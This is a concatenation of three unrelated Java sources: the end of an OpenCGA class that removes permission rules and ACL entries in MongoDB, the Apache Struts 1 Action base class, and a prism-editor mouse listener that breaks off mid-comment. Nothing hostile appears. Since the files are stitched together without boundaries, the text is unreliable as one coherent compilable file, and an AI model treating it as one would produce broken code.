        removeReferenceToPermissionRuleInStudy(study.getUid(), permissionRuleToDeleteId, entry);

        return OpenCGAResult.empty();
    }

    // Detaches the rule id tag from every tagged entry without touching any ACL, then drops
    // the rule from the study document.
    //TODO: Make transactional !
    @Override
    public OpenCGAResult removePermissionRule(long studyId, String permissionRuleToDelete, Enums.Entity entry) throws CatalogException {
        // Remove the __TODELETE tag...
        String permissionRuleId = permissionRuleToDelete.split(INTERNAL_DELIMITER)[0];

        Document query = new Document()
                .append(PRIVATE_STUDY_UID, studyId)
                .append(PERMISSION_RULES_APPLIED, permissionRuleId);
        Document update = new Document()
                .append("$pull", new Document(PERMISSION_RULES_APPLIED, permissionRuleId));
        logger.debug("Remove permission rule id from all {} in study {}: Query {}, Update {}", entry, studyId,
                query.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));

        MongoDBCollection collection = dbCollectionMap.get(entry.getResource());
        DataResult result = collection.update(query, update, new QueryOptions("multi", true));
        if (result.getNumUpdated() == 0) {
            throw new CatalogException("Could not remove permission rule id " + permissionRuleId + " from all " + entry);
        }

        // Remove the permission rule from the map in the study
        removeReferenceToPermissionRuleInStudy(studyId, permissionRuleToDelete, entry);

        return OpenCGAResult.empty();
    }

    // True for entity types whose manual ACLs are mirrored in _userAcls (i.e. the types that
    // support permission rules); studies themselves are excluded.
    private boolean isPermissionRuleEntity(Enums.Resource resource) {
        if (Enums.Entity.CLINICAL_ANALYSES.getResource() == resource || Enums.Entity.COHORTS.getResource() == resource
                || Enums.Entity.FAMILIES.getResource() == resource || Enums.Entity.FILES.getResource() == resource
                || Enums.Entity.INDIVIDUALS.getResource() == resource || Enums.Entity.JOBS.getResource() == resource
                || Enums.Entity.SAMPLES.getResource() == resource) {
            return true;
        }
        return false;
    }

    // Pulls the permission rule entry (matched by id) out of the study's permissionRules.<entity> list.
    private void removeReferenceToPermissionRuleInStudy(long studyId, String permissionRuleToDelete, Enums.Entity entry)
            throws CatalogException {
        Document query = new Document()
                .append(PRIVATE_UID, studyId)
                .append(StudyDBAdaptor.QueryParams.PERMISSION_RULES.key() + "." + entry + ".id", permissionRuleToDelete);
        Document update = new Document("$pull", new Document(StudyDBAdaptor.QueryParams.PERMISSION_RULES.key() + "."
                + entry, new Document("id", permissionRuleToDelete)));
        logger.debug("Remove permission rule from the study {}: Query {}, Update {}", studyId,
                query.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()),
                update.toBsonDocument(Document.class, MongoClient.getDefaultCodecRegistry()));
        DataResult result = dbCollectionMap.get(Enums.Resource.STUDY).update(query, update, new QueryOptions("multi", true));
        if (result.getNumUpdated() == 0) {
            throw new CatalogException("Could not remove permission rule " + permissionRuleToDelete + " from study " + studyId);
        }
    }

    // Delegates the permission-rule query to the DB adaptor of the concrete entity, merging it
    // with the raw (study / rule-tag) filters.
    private Bson parseQuery(Query query, Document rawQuery, Enums.Resource entry) throws CatalogException {
        switch (entry) {
            case COHORT:
                return dbAdaptorFactory.getCatalogCohortDBAdaptor().parseQuery(query, rawQuery);
            case INDIVIDUAL:
                return dbAdaptorFactory.getCatalogIndividualDBAdaptor().parseQuery(query, rawQuery);
            case JOB:
                return dbAdaptorFactory.getCatalogJobDBAdaptor().parseQuery(query, rawQuery, QueryOptions.empty());
            case FILE:
                return dbAdaptorFactory.getCatalogFileDBAdaptor().parseQuery(query, rawQuery);
            case SAMPLE:
                return dbAdaptorFactory.getCatalogSampleDBAdaptor().parseQuery(query, rawQuery);
            case FAMILY:
                return dbAdaptorFactory.getCatalogFamilyDBAdaptor().parseQuery(query, rawQuery);
            case CLINICAL_ANALYSIS:
                return dbAdaptorFactory.getClinicalAnalysisDBAdaptor().parseQuery(query, rawQuery);
            default:
                throw new CatalogException("Unexpected parameter received. " + entry + " has been received.");
        }
    }

    // Pulls every possible permission of the given users from all documents of the resource type
    // in the study (from both the effective and the user-defined ACL arrays).
    private void removePermissions(ClientSession clientSession, long studyId, List<String> users, Enums.Resource resource) {
        List<String> permissions = getFullPermissions(resource);
        List<String> removePermissions = createPermissionArray(users, permissions);

        MongoDBCollection collection = dbCollectionMap.get(resource);
        Document queryDocument = new Document()
                .append(PRIVATE_STUDY_UID, studyId)
                .append(QueryParams.ACL.key(), new Document("$in", removePermissions));
        Document update = new Document("$pullAll", new Document()
                .append(QueryParams.ACL.key(), removePermissions)
                .append(QueryParams.USER_DEFINED_ACLS.key(), removePermissions)
        );

        collection.update(clientSession, queryDocument, update, new QueryOptions("multi", true));
    }

    // Flattens a member -> permissions map into "member<INTERNAL_DELIMITER>PERMISSION" strings.
    // NOTE(review): mutates the caller's map in place — "NONE" is appended to every empty
    // permission list of the input. Verify no caller relies on those lists staying untouched.
    private List<String> createPermissionArray(Map<String, List<String>> memberPermissionsMap) {
        List<String> myPermissions = new ArrayList<>(memberPermissionsMap.size() * 2);
        for (Map.Entry<String, List<String>> stringListEntry : memberPermissionsMap.entrySet()) {
            if (stringListEntry.getValue().isEmpty()) {
                stringListEntry.getValue().add("NONE");
            }
            for (String permission : stringListEntry.getValue()) {
                myPermissions.add(stringListEntry.getKey() + INTERNAL_DELIMITER + permission);
            }
        }
        return myPermissions;
    }

    // Cartesian product of members x permissions encoded as "member<INTERNAL_DELIMITER>PERMISSION";
    // an empty permission list is replaced by the single synthetic "NONE" marker.
    private List<String> createPermissionArray(List<String> members, List<String> permissions) {
        List<String> writtenPermissions;
        if (permissions.isEmpty()) {
            writtenPermissions = Arrays.asList("NONE");
        } else {
            writtenPermissions = permissions;
        }

        List<String> myPermissions = new ArrayList<>(members.size() * writtenPermissions.size());
        for (String member : members) {
            for (String writtenPermission : writtenPermissions) {
                myPermissions.add(member + INTERNAL_DELIMITER + writtenPermission);
            }
        }
        return myPermissions;
    }
}
/*
 * $Id: Action.java 526638 2007-04-09 03:02:03Z pbenedict $
 *
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements. See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership. The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied. See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */
package org.apache.struts.action;

import org.apache.struts.Globals;
import org.apache.struts.config.ModuleConfig;
import org.apache.struts.util.MessageResources;
import org.apache.struts.util.ModuleUtils;
import org.apache.struts.util.RequestUtils;
import org.apache.struts.util.TokenProcessor;

import javax.servlet.ServletContext;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

import java.util.Locale;

/**
 * <p>An <strong>Action</strong> is an adapter between the contents of an
 * incoming HTTP request and the corresponding business logic that should be
 * executed to process this request. The controller (RequestProcessor) will
 * select an appropriate Action for each request, create an instance (if
 * necessary), and call the <code>execute</code> method.</p>
 *
 * <p>Actions must be programmed in a thread-safe manner, because the
 * controller will share the same instance for multiple simultaneous requests.
 * This means you should design with the following items in mind: </p>
 *
 * <ul>
 *
 * <li>Instance and static variables MUST NOT be used to store information
 * related to the state of a particular request. They MAY be used to share
 * global resources across requests for the same action.</li>
 *
 * <li>Access to other resources (JavaBeans, session variables, etc.) MUST be
 * synchronized if those resources require protection. (Generally, however,
 * resource classes should be designed to provide their own protection where
 * necessary.)</li>
 *
 * </ul>
 *
 * <p>When an <code>Action</code> instance is first created, the controller
 * will call <code>setServlet</code> with a non-null argument to identify the
 * servlet instance to which this Action is attached. When the servlet is to
 * be shut down (or restarted), the <code>setServlet</code> method will be
 * called with a <code>null</code> argument, which can be used to clean up any
 * allocated resources in use by this Action.</p>
 *
 * @version $Rev: 526638 $ $Date: 2005-08-26 21:58:39 -0400 (Fri, 26 Aug 2005)
 *          $
 */
public class Action {
    /**
     * <p>An instance of <code>TokenProcessor</code> to use for token
     * functionality.</p>
     */
    private static TokenProcessor token = TokenProcessor.getInstance();

    /**
     * The action execution was a failure. Show an error view, possibly asking
     * the user to retry entering data.
     *
     * @since Struts 1.4
     */
    public static final String ERROR = "error";

    /**
     * The action execution require more input in order to succeed. This
     * result is typically used if a form handling action has been executed
     * so as to provide defaults for a form. The form associated with the
     * handler should be shown to the end user.
     * <p>
     * This result is also used if the given input params are invalid,
     * meaning the user should try providing input again.
     *
     * @since Struts 1.4
     */
    public static final String INPUT = "input";

    /**
     * The action could not execute, since the user was not logged in.
     * The login view should be shown.
     *
     * @since Struts 1.4
     */
    public static final String LOGIN = "login";

    /**
     * The action execution was successful. Show result view to the end user.
     *
     * @since Struts 1.4
     */
    public static final String SUCCESS = "success";

    // NOTE: We can make the token variable protected and remove Action's
    // token methods or leave it private and allow the token methods to
    // delegate their calls.

    // ----------------------------------------------------- Instance Variables

    /**
     * <p>The servlet to which we are attached.</p>
     */
    protected transient ActionServlet servlet = null;

    // ------------------------------------------------------------- Properties

    /**
     * <p>Return the servlet instance to which we are attached.</p>
     *
     * @return The servlet instance to which we are attached.
     */
    public ActionServlet getServlet() {
        return (this.servlet);
    }

    /**
     * <p>Set the servlet instance to which we are attached (if
     * <code>servlet</code> is non-null), or release any allocated resources
     * (if <code>servlet</code> is null).</p>
     *
     * @param servlet The new controller servlet, if any
     */
    public void setServlet(ActionServlet servlet) {
        this.servlet = servlet;

        // :FIXME: Is this supposed to release resources?
    }

    // --------------------------------------------------------- Public Methods

    /**
     * <p>Process the specified non-HTTP request, and create the corresponding
     * non-HTTP response (or forward to another web component that will create
     * it), with provision for handling exceptions thrown by the business
     * logic. Return an {@link ActionForward} instance describing where and
     * how control should be forwarded, or <code>null</code> if the response
     * has already been completed.</p>
     *
     * <p>The default implementation attempts to forward to the HTTP version
     * of this method.</p>
     *
     * @param mapping  The ActionMapping used to select this instance
     * @param form     The optional ActionForm bean for this request (if any)
     * @param request  The non-HTTP request we are processing
     * @param response The non-HTTP response we are creating
     * @return The forward to which control should be transferred, or
     *         <code>null</code> if the response has been completed.
     * @throws Exception if the application business logic throws an
     *                   exception.
     * @since Struts 1.1
     */
    public ActionForward execute(ActionMapping mapping, ActionForm form,
        ServletRequest request, ServletResponse response)
        throws Exception {
        try {
            return execute(mapping, form, (HttpServletRequest) request,
                (HttpServletResponse) response);
        } catch (ClassCastException e) {
            // NOTE(review): a non-HTTP request/response is deliberately treated as
            // "nothing to do" and null is returned (response assumed complete);
            // the exception itself carries no information worth propagating here.
            return null;
        }
    }

    /**
     * <p>Process the specified HTTP request, and create the corresponding
     * HTTP response (or forward to another web component that will create
     * it), with provision for handling exceptions thrown by the business
     * logic. Return an {@link ActionForward} instance describing where and
     * how control should be forwarded, or <code>null</code> if the response
     * has already been completed.</p>
     *
     * @param mapping  The ActionMapping used to select this instance
     * @param form     The optional ActionForm bean for this request (if any)
     * @param request  The HTTP request we are processing
     * @param response The HTTP response we are creating
     * @return The forward to which control should be transferred, or
     *         <code>null</code> if the response has been completed.
     * @throws Exception if the application business logic throws an
     *                   exception
     * @since Struts 1.1
     */
    public ActionForward execute(ActionMapping mapping, ActionForm form,
        HttpServletRequest request, HttpServletResponse response)
        throws Exception {
        // Default no-op implementation; concrete Actions override this.
        return null;
    }

    // ---------------------------------------------------- Protected Methods

    /**
     * Adds the specified messages keys into the appropriate request attribute
     * for use by the &lt;html:messages&gt; tag (if messages="true" is set),
     * if any messages are required. Initialize the attribute if it has not
     * already been. Otherwise, ensure that the request attribute is not set.
     *
     * @param request  The servlet request we are processing
     * @param messages Messages object
     * @since Struts 1.2.1
     */
    protected void addMessages(HttpServletRequest request,
        ActionMessages messages) {
        if (messages == null) {
            // bad programmer! *slap*
            return;
        }

        // get any existing messages from the request, or make a new one
        ActionMessages requestMessages =
            (ActionMessages) request.getAttribute(Globals.MESSAGE_KEY);

        if (requestMessages == null) {
            requestMessages = new ActionMessages();
        }

        // add incoming messages
        requestMessages.add(messages);

        // if still empty, just wipe it out from the request
        if (requestMessages.isEmpty()) {
            request.removeAttribute(Globals.MESSAGE_KEY);

            return;
        }

        // Save the messages
        request.setAttribute(Globals.MESSAGE_KEY, requestMessages);
    }

    /**
     * Adds the specified errors keys into the appropriate request attribute
     * for use by the &lt;html:errors&gt; tag, if any messages are required.
     * Initialize the attribute if it has not already been. Otherwise, ensure
     * that the request attribute is not set.
     *
     * @param request The servlet request we are processing
     * @param errors  Errors object
     * @since Struts 1.2.1
     */
    protected void addErrors(HttpServletRequest request, ActionMessages errors) {
        if (errors == null) {
            // bad programmer! *slap*
            return;
        }

        // get any existing errors from the request, or make a new one
        ActionMessages requestErrors =
            (ActionMessages) request.getAttribute(Globals.ERROR_KEY);

        if (requestErrors == null) {
            requestErrors = new ActionMessages();
        }

        // add incoming errors
        requestErrors.add(errors);

        // if still empty, just wipe it out from the request
        if (requestErrors.isEmpty()) {
            request.removeAttribute(Globals.ERROR_KEY);

            return;
        }

        // Save the errors
        request.setAttribute(Globals.ERROR_KEY, requestErrors);
    }

    /**
     * <p>Generate a new transaction token, to be used for enforcing a single
     * request for a particular transaction.</p>
     *
     * @param request The request we are processing
     * @return The new transaction token.
     */
    protected String generateToken(HttpServletRequest request) {
        return token.generateToken(request);
    }

    /**
     * Retrieves any existing errors placed in the request by previous
     * actions. This method could be called instead of creating a <code>new
     * ActionMessages()</code> at the beginning of an <code>Action</code>.
     * This will prevent saveErrors() from wiping out any existing Errors
     *
     * @param request The servlet request we are processing
     * @return the Errors that already exist in the request, or a new
     *         ActionMessages object if empty.
     * @since Struts 1.2.1
     */
    protected ActionMessages getErrors(HttpServletRequest request) {
        ActionMessages errors =
            (ActionMessages) request.getAttribute(Globals.ERROR_KEY);

        if (errors == null) {
            errors = new ActionMessages();
        }

        return errors;
    }

    /**
     * <p>Return the user's currently selected Locale.</p>
     *
     * @param request The request we are processing
     * @return The user's currently selected Locale.
     */
    protected Locale getLocale(HttpServletRequest request) {
        return RequestUtils.getUserLocale(request, null);
    }

    /**
     * <p> Retrieves any existing messages placed in the request by previous
     * actions. This method could be called instead of creating a <code>new
     * ActionMessages()</code> at the beginning of an <code>Action</code> This
     * will prevent saveMessages() from wiping out any existing Messages </p>
     *
     * @param request The servlet request we are processing
     * @return the Messages that already exist in the request, or a new
     *         ActionMessages object if empty.
     * @since Struts 1.2.1
     */
    protected ActionMessages getMessages(HttpServletRequest request) {
        ActionMessages messages =
            (ActionMessages) request.getAttribute(Globals.MESSAGE_KEY);

        if (messages == null) {
            messages = new ActionMessages();
        }

        return messages;
    }

    /**
     * <p>Return the default message resources for the current module.</p>
     *
     * @param request The servlet request we are processing
     * @return The default message resources for the current module.
     * @since Struts 1.1
     */
    protected MessageResources getResources(HttpServletRequest request) {
        return ((MessageResources) request.getAttribute(Globals.MESSAGES_KEY));
    }

    /**
     * <p>Return the specified message resources for the current module.</p>
     *
     * @param request The servlet request we are processing
     * @param key     The key specified in the message-resources element for
     *                the requested bundle.
     * @return The specified message resource for the current module.
     * @since Struts 1.1
     */
    protected MessageResources getResources(HttpServletRequest request,
        String key) {
        // Identify the current module
        ServletContext context = getServlet().getServletContext();
        ModuleConfig moduleConfig =
            ModuleUtils.getInstance().getModuleConfig(request, context);

        // Return the requested message resources instance
        return (MessageResources) context.getAttribute(key
            + moduleConfig.getPrefix());
    }

    /**
     * <p>Returns <code>true</code> if the current form's cancel button was
     * pressed. This method will check if the <code>Globals.CANCEL_KEY</code>
     * request attribute has been set, which normally occurs if the cancel
     * button generated by <strong>CancelTag</strong> was pressed by the user
     * in the current request. If <code>true</code>, validation performed by
     * an <strong>ActionForm</strong>'s <code>validate()</code> method will
     * have been skipped by the controller servlet.</p>
     *
     * <p> Since Action 1.3.0, the mapping for a cancellable Action must also have
     * the new "cancellable" property set to true. If "cancellable" is not set, and
     * the magic Cancel token is found in the request, the standard Composable
     * Request Processor will throw an InvalidCancelException. </p>
     *
     * @param request The servlet request we are processing
     * @return <code>true</code> if the cancel button was pressed;
     *         <code>false</code> otherwise.
     */
    protected boolean isCancelled(HttpServletRequest request) {
        return (request.getAttribute(Globals.CANCEL_KEY) != null);
    }

    /**
     * <p>Return <code>true</code> if there is a transaction token stored in
     * the user's current session, and the value submitted as a request
     * parameter with this action matches it. Returns <code>false</code> under
     * any of the following circumstances:</p>
     *
     * <ul>
     *
     * <li>No session associated with this request</li>
     *
     * <li>No transaction token saved in the session</li>
     *
     * <li>No transaction token included as a request parameter</li>
     *
     * <li>The included transaction token value does not match the transaction
     * token in the user's session</li>
     *
     * </ul>
     *
     * @param request The servlet request we are processing
     * @return <code>true</code> if there is a transaction token and it is
     *         valid; <code>false</code> otherwise.
     */
    protected boolean isTokenValid(HttpServletRequest request) {
        return token.isTokenValid(request, false);
    }

    /**
     * <p>Return <code>true</code> if there is a transaction token stored in
     * the user's current session, and the value submitted as a request
     * parameter with this action matches it. Returns <code>false</code> under
     * any of the following circumstances:</p>
     *
     * <ul>
     *
     * <li>No session associated with this request</li>
     *
     * <li>No transaction token saved in the session</li>
     *
     * <li>No transaction token included as a request parameter</li>
     *
     * <li>The included transaction token value does not match the transaction
     * token in the user's session</li>
     *
     * </ul>
     *
     * @param request The servlet request we are processing
     * @param reset   Should we reset the token after checking it?
     * @return <code>true</code> if there is a transaction token and it is
     *         valid; <code>false</code> otherwise.
     */
    protected boolean isTokenValid(HttpServletRequest request, boolean reset) {
        return token.isTokenValid(request, reset);
    }

    /**
     * <p>Reset the saved transaction token in the user's session. This
     * indicates that transactional token checking will not be needed on the
     * next request that is submitted.</p>
     *
     * @param request The servlet request we are processing
     */
    protected void resetToken(HttpServletRequest request) {
        token.resetToken(request);
    }

    /**
     * <p>Save the specified error messages keys into the appropriate request
     * attribute for use by the &lt;html:errors&gt; tag, if any messages are
     * required. Otherwise, ensure that the request attribute is not
     * created.</p>
     *
     * @param request The servlet request we are processing
     * @param errors  Error messages object
     * @since Struts 1.2
     */
    protected void saveErrors(HttpServletRequest request, ActionMessages errors) {
        // Remove any error messages attribute if none are required
        if ((errors == null) || errors.isEmpty()) {
            request.removeAttribute(Globals.ERROR_KEY);

            return;
        }

        // Save the error messages we need
        request.setAttribute(Globals.ERROR_KEY, errors);
    }

    /**
     * <p>Save the specified messages keys into the appropriate request
     * attribute for use by the &lt;html:messages&gt; tag (if messages="true"
     * is set), if any messages are required. Otherwise, ensure that the
     * request attribute is not created.</p>
     *
     * @param request  The servlet request we are processing.
     * @param messages The messages to save. <code>null</code> or empty
     *                 messages removes any existing ActionMessages in the
     *                 request.
     * @since Struts 1.1
     */
    protected void saveMessages(HttpServletRequest request,
        ActionMessages messages) {
        // Remove any messages attribute if none are required
        if ((messages == null) || messages.isEmpty()) {
            request.removeAttribute(Globals.MESSAGE_KEY);

            return;
        }

        // Save the messages we need
        request.setAttribute(Globals.MESSAGE_KEY, messages);
    }

    /**
     * <p>Save the specified messages keys into the appropriate session
     * attribute for use by the &lt;html:messages&gt; tag (if messages="true"
     * is set), if any messages are required. Otherwise, ensure that the
     * session attribute is not created.</p>
     *
     * @param session  The session to save the messages in.
     * @param messages The messages to save. <code>null</code> or empty
     *                 messages removes any existing ActionMessages in the
     *                 session.
     * @since Struts 1.2
     */
    protected void saveMessages(HttpSession session, ActionMessages messages) {
        // Remove any messages attribute if none are required
        if ((messages == null) || messages.isEmpty()) {
            session.removeAttribute(Globals.MESSAGE_KEY);

            return;
        }

        // Save the messages we need
        session.setAttribute(Globals.MESSAGE_KEY, messages);
    }

    /**
     * <p>Save the specified error messages keys into the appropriate session
     * attribute for use by the &lt;html:messages&gt; tag (if
     * messages="false") or &lt;html:errors&gt;, if any error messages are
     * required. Otherwise, ensure that the session attribute is empty.</p>
     *
     * @param session The session to save the error messages in.
     * @param errors  The error messages to save. <code>null</code> or empty
     *                messages removes any existing error ActionMessages in
     *                the session.
     * @since Struts 1.3
     */
    protected void saveErrors(HttpSession session, ActionMessages errors) {
        // Remove the error attribute if none are required
        if ((errors == null) || errors.isEmpty()) {
            session.removeAttribute(Globals.ERROR_KEY);

            return;
        }

        // Save the errors we need
        session.setAttribute(Globals.ERROR_KEY, errors);
    }

    /**
     * <p>Save a new transaction token in the user's current session, creating
     * a new session if necessary.</p>
     *
     * @param request The servlet request we are processing
     */
    protected void saveToken(HttpServletRequest request) {
        token.saveToken(request);
    }

    /**
     * <p>Set the user's currently selected <code>Locale</code> into their
     * <code>HttpSession</code>.</p>
     *
     * @param request The request we are processing
     * @param locale  The user's selected Locale to be set, or null to select
     *                the server's default Locale
     */
    protected void setLocale(HttpServletRequest request, Locale locale) {
        HttpSession session = request.getSession();

        if (locale == null) {
            locale = Locale.getDefault();
        }

        session.setAttribute(Globals.LOCALE_KEY, locale);
    }
}
package userinterface;

import managers.PrismManager;
import prisms.Cube;
import prisms.Equilateral;
import prisms.Pentagonal;
import prisms.Prism;
import shapes.Shape;
import util.Matrix3;
import util.PrismType;
import util.Vertex;

import java.awt.*;
import java.awt.event.MouseEvent;
import java.awt.event.MouseListener;
import java.awt.geom.Path2D;
import java.util.ArrayList;
import java.util.List;
import java.util.Timer;
import java.util.TimerTask;

/**
 * Mouse handler for the prism editor.
 *
 * <p>A left press selects the topmost prism under the cursor. While the button
 * is held, a background {@link Timer} task polls the pointer every 20 ms and
 * applies the currently selected tool (move / rotate / resize); with Ctrl held
 * it pans the grid origin instead.</p>
 *
 * <p>NOTE(review): {@code mouseDown} and {@code oldScreenX/Y} are written on
 * the AWT event thread and read on the timer thread without synchronization —
 * same as the original implementation; confirm this is acceptable.</p>
 */
public class PrismMouseListener implements MouseListener {

    /** Smallest value any prism dimension may be resized down to. */
    private static final int MIN_DIMENSION = 10;

    /** Interval, in milliseconds, at which the drag task polls the pointer. */
    private static final long DRAG_POLL_INTERVAL_MS = 20;

    private final UserInterface userInterface;
    private final PrismManager prismManager;
    private final InterfaceActions interfaceActions;
    private final KeyboardListener keyboardListener;
    private final Timer timer = new Timer();
    private boolean mouseDown = false;
    private TimerTask dragTask = null;
    private int oldScreenX;
    private int oldScreenY;

    /**
     * Wires the listener to its collaborators and starts the drag-polling task.
     */
    public PrismMouseListener(final UserInterface userInterface, final PrismManager prismManager,
                              final InterfaceActions interfaceActions, final KeyboardListener keyboardListener) {
        this.prismManager = prismManager;
        this.userInterface = userInterface;
        this.interfaceActions = interfaceActions;
        this.keyboardListener = keyboardListener;
        this.dragTask = new TimerTask() {
            @Override
            public void run() {
                pollDrag();
            }
        };
        this.timer.schedule(this.dragTask, DRAG_POLL_INTERVAL_MS, DRAG_POLL_INTERVAL_MS);
    }

    /**
     * One drag-polling tick: computes the pointer delta since the last applied
     * position and dispatches it to the active tool.
     */
    private void pollDrag() {
        if (!mouseDown) {
            return;
        }
        Prism selectedPrism = prismManager.getSelectedPrism();
        Point mousePoint = MouseInfo.getPointerInfo().getLocation();
        int xChange = mousePoint.x - oldScreenX;
        int yChange = mousePoint.y - oldScreenY;
        if (xChange == 0 && yChange == 0) {
            return;
        }
        Component selectedComponent = interfaceActions.getSelectedComponent();
        // Sample the Ctrl state once per tick so every branch sees the same value.
        boolean ctrlHeld = keyboardListener.holdingCtrl();

        if (selectedComponent == null) {
            // No tool selected: Ctrl-drag pans the grid. (The original had a second,
            // identical pan branch after the tool checks that was unreachable — it and
            // a stray debug System.out.println() have been removed.)
            if (ctrlHeld) {
                panGrid(mousePoint, xChange, yChange);
                UserInterface.repaint();
            }
        } else if (selectedComponent.equals(userInterface.getMoveButton())) {
            dragMove(selectedPrism, mousePoint, xChange, yChange, ctrlHeld);
        } else if (selectedComponent.equals(userInterface.getRotateButton())) {
            dragRotate(selectedPrism, mousePoint, xChange, yChange, ctrlHeld);
        } else if (selectedComponent.equals(userInterface.getResizeButton())) {
            dragResize(selectedPrism, mousePoint, xChange, yChange);
        }
    }

    /**
     * Shifts the grid origin by the pointer delta and refreshes the coordinate
     * labels. Also commits the pointer position so the delta is not re-applied.
     */
    private void panGrid(Point mousePoint, int xChange, int yChange) {
        oldScreenX = mousePoint.x;
        oldScreenY = mousePoint.y;
        Vertex gridOrigin = userInterface.getGridOrigin();
        gridOrigin.setX(gridOrigin.getX() + xChange);
        gridOrigin.setY(gridOrigin.getY() + yChange);
        userInterface.getXCordLabel().setText("X: " + (int) gridOrigin.getX());
        userInterface.getYCordLabel().setText("Y: " + (int) gridOrigin.getY());
    }

    /**
     * Move tool: Ctrl pans the grid; otherwise the selected prism's origin is
     * dragged, clamped per axis to the drawable region. Each axis only commits
     * the pointer position when its move was actually applied.
     */
    private void dragMove(Prism selectedPrism, Point mousePoint, int xChange, int yChange, boolean ctrlHeld) {
        if (ctrlHeld) {
            panGrid(mousePoint, xChange, yChange);
        } else if (selectedPrism != null) {
            Vertex origin = selectedPrism.getOrigin();
            if (xChange + origin.getX() < UserInterface.getWidth() / 2 && xChange + origin.getX() >= 0) {
                oldScreenX = mousePoint.x;
                origin.setX(origin.getX() + xChange);
                userInterface.getXOriginField().setText(" " + (int) origin.getX());
            }
            if (yChange + origin.getY() < UserInterface.getHeight() && yChange + origin.getY() >= 0) {
                oldScreenY = mousePoint.y;
                origin.setY(origin.getY() + yChange);
                userInterface.getYOriginField().setText(" " + (int) origin.getY());
            }
        } else {
            // Nothing to move and not panning: skip the repaint.
            return;
        }
        UserInterface.repaint();
    }

    /**
     * Rotate tool: horizontal drag adjusts heading, vertical drag adjusts
     * pitch — of the whole scene with Ctrl, otherwise of the selected prism.
     */
    private void dragRotate(Prism selectedPrism, Point mousePoint, int xChange, int yChange, boolean ctrlHeld) {
        oldScreenX = mousePoint.x;
        oldScreenY = mousePoint.y;
        if (ctrlHeld) {
            userInterface.setHeadingValue(userInterface.getHeadingValue() + xChange);
            userInterface.setPitchValue(userInterface.getPitchValue() + yChange);
        } else if (selectedPrism != null) {
            selectedPrism.setHeadingValue(selectedPrism.getHeadingValue() + xChange);
            selectedPrism.setPitchValue(selectedPrism.getPitchValue() + yChange);
        } else {
            return;
        }
        UserInterface.repaint();
    }

    /**
     * Resize tool: grows/shrinks the selected prism by the averaged drag delta
     * (right/up grows), never below {@link #MIN_DIMENSION}, and mirrors the new
     * value into the corresponding text field.
     */
    private void dragResize(Prism selectedPrism, Point mousePoint, int xChange, int yChange) {
        oldScreenX = mousePoint.x;
        oldScreenY = mousePoint.y;
        if (selectedPrism == null) {
            return;
        }
        int averageChange = (xChange - yChange) / 2;
        if (selectedPrism.getType() == PrismType.CUBE) {
            Cube cube = (Cube) selectedPrism;
            if (cube.getRealLength() + averageChange >= MIN_DIMENSION) {
                cube.setRealLength(cube.getRealLength() + averageChange);
                // BUG FIX: the field used to display getRealLength() + averageChange AFTER
                // the setter had already applied averageChange, showing too large a value.
                userInterface.getLengthField().setText("" + cube.getRealLength());
            }
        } else if (selectedPrism.getType() == PrismType.EQUILATERAL) {
            Equilateral equilateral = (Equilateral) selectedPrism;
            if (equilateral.getRealLength() + averageChange >= MIN_DIMENSION) {
                equilateral.setRealLength(equilateral.getRealLength() + averageChange);
                userInterface.getLengthField().setText("" + equilateral.getRealLength()); // see BUG FIX above
            }
        } else if (selectedPrism.getType() == PrismType.PENTAGONAL) {
            Pentagonal pentagonal = (Pentagonal) selectedPrism;
            if (pentagonal.getRealRadius() + averageChange >= MIN_DIMENSION) {
                pentagonal.setRealRadius(pentagonal.getRealRadius() + averageChange);
                userInterface.getRadiusField().setText("" + pentagonal.getRealRadius()); // see BUG FIX above
            }
            if (pentagonal.getRealHeight() + averageChange >= MIN_DIMENSION) {
                pentagonal.setRealHeight(pentagonal.getRealHeight() + averageChange);
                userInterface.getHeightField().setText("" + pentagonal.getRealHeight()); // see BUG FIX above
            }
        }
        UserInterface.repaint();
    }

    @Override
    public void mousePressed(MouseEvent e) {
        if (e.getButton() != MouseEvent.BUTTON1) {
            return;
        }
        this.mouseDown = true;
        this.oldScreenX = e.getXOnScreen();
        this.oldScreenY = e.getYOnScreen();

        // Capture the selection BEFORE hit-testing: the repaint below depends on
        // whether something was already selected when the press happened.
        Prism previouslySelected = this.prismManager.getSelectedPrism();
        selectPrismAt(e.getX(), e.getY(), previouslySelected);

        if (previouslySelected != null) {
            UserInterface.repaint();
        }
        Component selectedComponent = this.interfaceActions.getSelectedComponent();
        if (selectedComponent == null
                || !(selectedComponent.equals(this.userInterface.getMoveButton())
                || selectedComponent.equals(this.userInterface.getRotateButton())
                || selectedComponent.equals(this.userInterface.getResizeButton()))) {
            this.interfaceActions.switchToNoPrismSelected();
        }
    }

    /**
     * Hit-tests the click against all prisms (back-to-front so the topmost one
     * wins) and, when a different prism is hit, makes it the selection.
     */
    private void selectPrismAt(int x, int y, Prism previouslySelected) {
        double xGridOrigin = this.userInterface.getGridOrigin().getX();
        double yGridOrigin = this.userInterface.getGridOrigin().getY();
        List<Prism> prisms = this.prismManager.getPrisms();
        for (int prismIndex = prisms.size() - 1; prismIndex >= 0; prismIndex--) {
            Prism prism = prisms.get(prismIndex);
            Matrix3 transform = this.userInterface.getTransform(prism);
            Vertex origin = prism.getOrigin();
            for (Shape shape : prism.getShapes()) {
                Path2D path = projectShape(shape, transform,
                        origin.getX() + xGridOrigin, origin.getY() + yGridOrigin);
                if (path.contains(x, y)) {
                    if (previouslySelected == null || !previouslySelected.equals(prism)) {
                        this.prismManager.setSelectedPrism(prism);
                        this.userInterface.getRemoveButton().setVisible(true);
                        this.interfaceActions.switchToPrismSelected();
                    }
                    return;
                }
            }
        }
    }

    /**
     * Projects a shape's vertices through the prism transform, offsets them by
